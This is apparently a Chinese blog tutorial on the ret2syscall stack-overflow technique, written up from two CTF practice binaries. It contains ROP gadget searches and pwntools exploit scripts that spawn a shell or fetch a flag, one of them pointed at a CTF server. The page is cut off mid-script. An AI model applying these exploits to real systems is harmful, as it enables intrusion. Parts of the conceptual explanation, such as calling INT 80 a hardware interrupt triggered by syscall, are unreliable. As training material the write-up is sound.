<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="wutong">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://wutong01304.github.io/2023/07/09/ret2syscall/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="ret2syscall 即控制程序执行系统调用来获取 shell。当发现没有system可以直接调用，并且发现通过函数泄露地址去猜libc也不太适用，没法泄露和计算libc的加载基地址的时候，就要使用ret2syscall。 一、ret2syscall1.1 介绍ret2syscall，顾名思义，就是将返回地址指向系统调用函数，从而实现在用户态执行特权指令的目的。 函数系统调用，指运行在用户空间的">
<meta property="og:type" content="article">
<meta property="og:title" content="ret2syscall+mprotect函数介绍">
<meta property="og:url" content="https://wutong01304.github.io/2023/07/09/ret2syscall/index.html">
<meta property="og:site_name" content="wutong">
<meta property="og:description" content="ret2syscall 即控制程序执行系统调用来获取 shell。当发现没有system可以直接调用，并且发现通过函数泄露地址去猜libc也不太适用，没法泄露和计算libc的加载基地址的时候，就要使用ret2syscall。 一、ret2syscall1.1 介绍ret2syscall，顾名思义，就是将返回地址指向系统调用函数，从而实现在用户态执行特权指令的目的。 函数系统调用，指运行在用户空间的">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys6.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys7.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys8.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys9.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys10.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys11.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys20.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys13.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys14.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys15.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys19.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys17.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys18.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys22.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys21.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys12.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m4.png?x-oss-process=style/watermark">
<meta property="article:published_time" content="2023-07-09T13:49:25.000Z">
<meta property="article:modified_time" content="2023-07-18T13:09:41.218Z">
<meta property="article:author" content="wutong">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="Stack">
<meta property="article:tag" content="ret2syscall">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys1.png?x-oss-process=style/watermark">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <!--- Page Info-->
    
    <title>
        
            ret2syscall+mprotect函数介绍 -
        
        wutong
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"wutong01304.github.io","root":"/","language":"en"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":false,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":2,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":false,"site_pv":false,"site_uv":false,"post_pv":false},"pjax":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"static","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"梧桐","subtitle":{"text":["梧桐生矣，于彼朝阳"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":false,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.2.1","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Github":{"path":"https://github.com/wutong01304","icon":"github"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"cloud"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2023/7/1 11:45:14"};
    Global.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    Global.data_config = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                wutong
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                                    
                                        
                                            <i class="github"></i>
                                        
                                        GITHUB
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                             
                                
                                    <i class="github"></i>
                                
                                GITHUB
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
             
                <div class="article-title">         
                    <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscover.jpg" alt="ret2syscall+mprotect函数介绍" />
                    <h1 class="article-title-cover">ret2syscall+mprotect函数介绍</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-avatar.jpg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">wutong</span>
                            
                                <span class="author-label">Lv2</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-07-09 21:49:25</span>
        <span class="mobile">2023-07-09 21:49</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-07-18 21:09:41</span>
            <span class="mobile">2023-07-18 21:09</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Pwn/">Pwn</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Stack/">Stack</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/ret2syscall/">ret2syscall</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <p>ret2syscall 即控制程序执行系统调用来获取 shell。当发现没有system可以直接调用，并且发现通过函数泄露地址去猜libc也不太适用，没法泄露和计算libc的加载基地址的时候，就要使用ret2syscall。</p>
<h1 id="一、ret2syscall"><a href="#一、ret2syscall" class="headerlink" title="一、ret2syscall"></a>一、ret2syscall</h1><h2 id="1-1-介绍"><a href="#1-1-介绍" class="headerlink" title="1.1 介绍"></a>1.1 介绍</h2><p>ret2syscall，顾名思义，就是将返回地址指向系统调用函数，从而实现在用户态执行特权指令的目的。</p>
<p>函数系统调用，指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。系统调用提供用户程序与操作系统之间的接口。具体来说，当一个程序调用系统调用函数时，系统会将当前程序的上下文（包括程序计数器、堆栈指针等）保存在内核栈中，并将控制权交给操作系统。在系统调用完成后，系统会将上下文恢复，并将控制权交回给程序。但是，如果系统调用函数的参数验证不足或者越界访问，就可能导致攻击者通过构造恶意输入来篡改内核栈中的返回地址，使得程序在返回时跳转到特权指令执行。</p>
<p>ret2syscall技术利用了这种漏洞，通过将返回地址指向系统调用函数来实现用户态执行特权指令的目的。具体实现方法包括以下步骤：</p>
<ol>
<li>定位系统调用函数的地址：攻击者需要先通过某种方式（如利用漏洞）获取系统调用函数的地址。</li>
<li>构造恶意输入：攻击者需要构造恶意输入，使得程序在执行系统调用时，将返回地址指向系统调用函数。</li>
<li>执行恶意输入：攻击者将构造好的恶意输入传递给程序，程序在执行系统调用时，会跳转到特权指令执行。</li>
</ol>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys1.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<h2 id="1-2-INT-80中断"><a href="#1-2-INT-80中断" class="headerlink" title="1.2 INT 80中断"></a>1.2 INT 80中断</h2><p>INT 80中断是x86架构计算机上的一种硬件中断。Linux系统通过软中断指令（如syscall指令）来触发INT 80中断，从而实现系统调用。具体来说，当程序需要执行一个系统调用时，它会使用syscall指令将系统调用的编号和参数传递给INT 80中断处理程序。</p>
<p>INT 80中断处理程序会根据系统调用的编号执行相应的服务程序，完成相应的操作，并将结果返回给程序。服务程序通常由操作系统内核提供，包括文件系统、网络通信、进程管理、内存管理等操作。</p>
<p><strong>32位系统中，应用程序调用系统调用的过程是：</strong></p>
<ol>
<li>把系统调用的编号存入 EAX；（用系统调用号来区分入口函数）</li>
<li>把函数参数存入其它通用寄存器；</li>
<li>触发 0x80 号中断（int 0x80）。</li>
</ol>
<p><strong>攻击原理：</strong></p>
<p>所有的系统调用都是通过0x80号中断来实现的，因此如果我们希望通过系统调用来获取 shell ，就需要建立第0x80终端，这就需要把系统调用的参数放入各个寄存器。通常我们选择构造 execve(“&#x2F;bin&#x2F;sh”,NULL,NULL) 函数。</p>
<p>首先我们需要知道 execve 的系统调用号是多少？可以直接在网上进行查询。参考链接：<a class="link"   target="_blank" rel="noopener" href="https://www.jianshu.com/p/324ef88a5213" >https://www.jianshu.com/p/324ef88a5213 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>execve 系统调用号为11，换算成16进制，也就是0xb。因此想要构造execve 函数，构造完后寄存器的值应该如下：eax指向0xb的地址，ebx指向&#x2F;bin&#x2F;sh的地址，ecx参数为0，edx参数也应该为0。</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys2.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>除了INT 80中断外，x64架构的Linux系统还使用其他类型的系统调用，例如通过软中断（signal）实现信号处理等。这将会在另外一篇博客<a href="https://wutong01304.github.io/2023/07/15/SROP/">SROP</a>中进行介绍。</p>
<h2 id="1-3-例子1"><a href="#1-3-例子1" class="headerlink" title="1.3 例子1"></a>1.3 例子1</h2><p>例题：<a class="link"   target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/blob/master/pwn/stackoverflow/ret2syscall/bamboofox-ret2syscall/rop" >https://github.com/ctf-wiki/ctf-challenges/blob/master/pwn/stackoverflow/ret2syscall/bamboofox-ret2syscall/rop <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> </p>
<p>参考了yinchen大佬的视频：<a class="link"   target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV177411p7Hu/?spm_id_from=333.999.0.0&vd_source=4481f768294d5110af6b9e0ab6a40ddd" >https://www.bilibili.com/video/BV177411p7Hu/?spm_id_from=333.999.0.0&amp;vd_source=4481f768294d5110af6b9e0ab6a40ddd <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>视频下面也给出了这道题目的附件：<a class="link"   target="_blank" rel="noopener" href="https://pan.baidu.com/s/1fbeBjaoX-rmW_BZRT7lxbg" >https://pan.baidu.com/s/1fbeBjaoX-rmW_BZRT7lxbg <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>  （跟题目是一个文件，上面下载不了可以下这个）</p>
<p>反汇编查看main函数：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys3.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>v4没有限制输入长度，可以溢出。</p>
<p>使用ROPgadget查找pop命令，来构造寄存器：</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary rop  --only &#x27;pop|ret&#x27; | grep &#x27;eax&#x27; </span><br></pre></td></tr></table></figure></div>

<p>查找到pop eax，ret：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys4.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>查找到pop ebx，ret:</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary rop  --only &#x27;pop|ret&#x27; | grep &#x27;ebx&#x27;</span><br></pre></td></tr></table></figure></div>

<p>注意这里有连续三个的寄存器，刚好可以控制ebx、ecx、edx：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys6.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>查找 ‘bin&#x2F;sh’ 字符：</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary rop --string &#x27;/bin/sh&#x27;</span><br></pre></td></tr></table></figure></div>

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys5.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>查找 INT 80中断：</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary rop --only &#x27;int&#x27;</span><br></pre></td></tr></table></figure></div>

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys7.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>查找完毕后就可以构造溢出数据了：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys8.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>程序转到返回地址后，会依次修改寄存器的值，从而构造execve函数执行条件，最后触发int 0x80中断，来进行系统调用，执行execve函数。</p>
<p>exp：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;./rop&#x27;</span>) <span class="comment">#以本地为攻击环境</span></span><br><span class="line">int_addr=<span class="number">0x8049421</span></span><br><span class="line">bin_addr=<span class="number">0x80be408</span></span><br><span class="line">pop_other_ret=<span class="number">0x806eb90</span></span><br><span class="line">pop_eax_ret=<span class="number">0x80bb196</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">112</span>+p32(pop_eax_ret)+p32(<span class="number">0xb</span>)+p32(pop_other_ret)+p32(<span class="number">0</span>)+p32(<span class="number">0</span>)+p32(bin_addr)+p32(int_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p>本地被打通：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys9.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<h2 id="1-4-例子2"><a href="#1-4-例子2" class="headerlink" title="1.4 例子2"></a>1.4 例子2</h2><p>题目：<a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#get_started_3dsctf_2016" >https://buuoj.cn/challenges#get_started_3dsctf_2016 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>  。题目名字：get_started_3dsctf_2016</p>
<p>反汇编：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys10.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>同样v4没有限制输入长度，可以溢出。</p>
<p>细心观察可以发现，有一个get_flag函数，令 if ( a1 &#x3D;&#x3D; 814536271 &amp;&amp; a2 &#x3D;&#x3D; 425138641 )满足，可以直接获得flag:</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys11.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>具体来说，通过溢出使其转到get_flag函数，然后使get_flag的参数等于814536271和425138641的地址就可以了（直接在IDA里面就可以找到）。注意程序需要正常退出才能回显，所以要使flag的返回地址后加一个退出地址。</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">27237</span>)</span><br><span class="line">get_flag=<span class="number">0x080489A0</span> <span class="comment">#get_flag函数地址</span></span><br><span class="line">arg0=<span class="number">0x308CD64F</span> <span class="comment">#814536271数字存放地址</span></span><br><span class="line">arg1=<span class="number">0x195719D1</span> <span class="comment">#425138641数字存放地址</span></span><br><span class="line">exit=<span class="number">0x0804E6A0</span> <span class="comment">#exit函数地址</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">56</span>+p32(get_flag)+p32(exit)+p32(arg0)+p32(arg1)</span><br><span class="line">p.sendline(payload) </span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys20.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>除此之外，使用ret2syscall方法进行攻击：同样使用ROPgadget查找pop命令，来构造寄存器：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary get_started_3dsctf_2016  --only <span class="string">&#x27;pop|ret&#x27;</span> | grep <span class="string">&#x27;eax&#x27;</span> </span><br><span class="line">ROPgadget --binary get_started_3dsctf_2016  --only <span class="string">&#x27;pop|ret&#x27;</span> | grep <span class="string">&#x27;ebx&#x27;</span> </span><br><span class="line">ROPgadget --binary get_started_3dsctf_2016  --only <span class="string">&#x27;int&#x27;</span></span><br><span class="line">ROPgadget --binary get_started_3dsctf_2016 --string <span class="string">&#x27;/bin/sh&#x27;</span></span><br></pre></td></tr></table></figure></div>

<p>pop eax、ebx、ecx、edx和 int 80的地址都找到了：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys13.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys14.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys15.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>但是bin&#x2F;sh的字符没有找到，这要怎么办呢？我们可以通过<strong>read</strong>函数向<strong>bss段</strong>输入一个bin&#x2F;sh字符。</p>
<p>首先在IDA查看read函数地址：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys19.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>然后我们要确定bss段地址，输入以下命令查找：</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">readelf -S get_started_3dsctf_2016 | grep bss</span><br></pre></td></tr></table></figure></div>

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys17.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>在IDA里面寻找一段没有数据的bss段地址，在这里，选取的是 0x0x080ebf8A：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys18.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>然后需要构造read函数的参数。构造read函数如下：read(0,bss,0x10)，即向bss地址处写入0x10字节的内容。</p>
<p>在执行完read后，为了使程序继续执行我们构造好的系统调用，需要把压入的参数压出，因此我们在 read 返回地址处填入一个可以pop 3个的地址。</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys22.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>构造好的栈溢出如下：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys21.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>exp：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">27237</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./get_started_3dsctf_2016&#x27;</span>)</span><br><span class="line">read=<span class="number">0x0806e140</span></span><br><span class="line">bss=<span class="number">0x080ebf8a</span></span><br><span class="line">pop_3_ret=<span class="number">0x080509a5</span></span><br><span class="line">int_80h = <span class="number">0x0806d7e5</span></span><br><span class="line">pop_eax = <span class="number">0x080b91e6</span></span><br><span 